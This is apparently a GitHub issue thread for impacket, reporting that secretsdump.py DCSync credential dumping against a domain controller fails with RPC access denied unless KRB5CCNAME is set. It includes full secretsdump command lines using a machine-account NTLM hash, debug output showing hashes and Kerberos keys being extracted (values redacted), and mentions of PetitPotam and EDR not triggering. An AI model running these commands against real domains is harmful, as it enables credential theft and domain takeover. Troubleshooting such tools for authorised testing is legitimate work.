impacket
impacket copied to clipboard
fortra
RPC Access Denied - Except when KRB5CCNAME is set with anything
Configuration
impacket version: v0.11.0 Python version: 3.11.4 Target OS: Kali
This does not work...
secretsdump.py -debug -ntds NTDS 'example.com/dc02$'@dc01.example.com -dc-ip 10.0.0.100 -hashes :<redacted> -outputfile ntdsdump -just-dc-user adminuser1
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /home/raithedavion/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[+] Exiting NTDSHashes.dump() because rpc_s_access_denied
[*] Cleaning up...
This does?
$ KRB5CCNAME=wtf.txt secretsdump.py -debug -ntds NTDS 'example.com/dc02$'@dc01.example.com -dc-ip 10.0.0.100 -hashes :<redacted> -outputfile ntdsdump -just-dc-user adminuser1
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /home/raithedavion/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[+] Saving output to ntdsdump
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for adminuser1
[+] Calling DRSGetNCChanges for {50a0e1bd-9021-436c-accb-ffeaa0276702}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=adminuser1,OU=Admin Users,DC=example,DC=com
example.com\adminuser1:22773:aad3b435b51404eeaad3b435b51404ee:<redacted>:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
example.com\adminuser1:aes256-cts-hmac-sha1-96:<redacted>
example.com\adminuser1:aes128-cts-hmac-sha1-96:<redacted>
example.com\adminuser1:des-cbc-md5:<redacted>
[*] Cleaning up...
Additional context
Used petitpotam to get DC's NTLM hashes when went an tried to dump the domain. Trying to dump domain on this client failed, so tried -just-dc-user (rpc_access_denied). Tried just about everything including ticketer, and finally set the KRB5CCNAME and all of a sudden it just works using -just-dc-user.
Repeated the steps, I've set KRB5CCName to blank (export KRB5CCNAMe=) and set it to non-existent files, and blank files (wtf.txt above). For some reason, only with KRB5CCName is set will it dump this domain. I don't know the domain's exact setup so that could have something to do with it, but find it odd that KRB5CCName being set is the fix when using the NTLM hash.
I've encountered this issue. EDR on the DC is not triggering nor is any other prevention. No crazy RPC hardening has occurred either. I was unable to even get the -just-dc-user flag to work with a specific user.
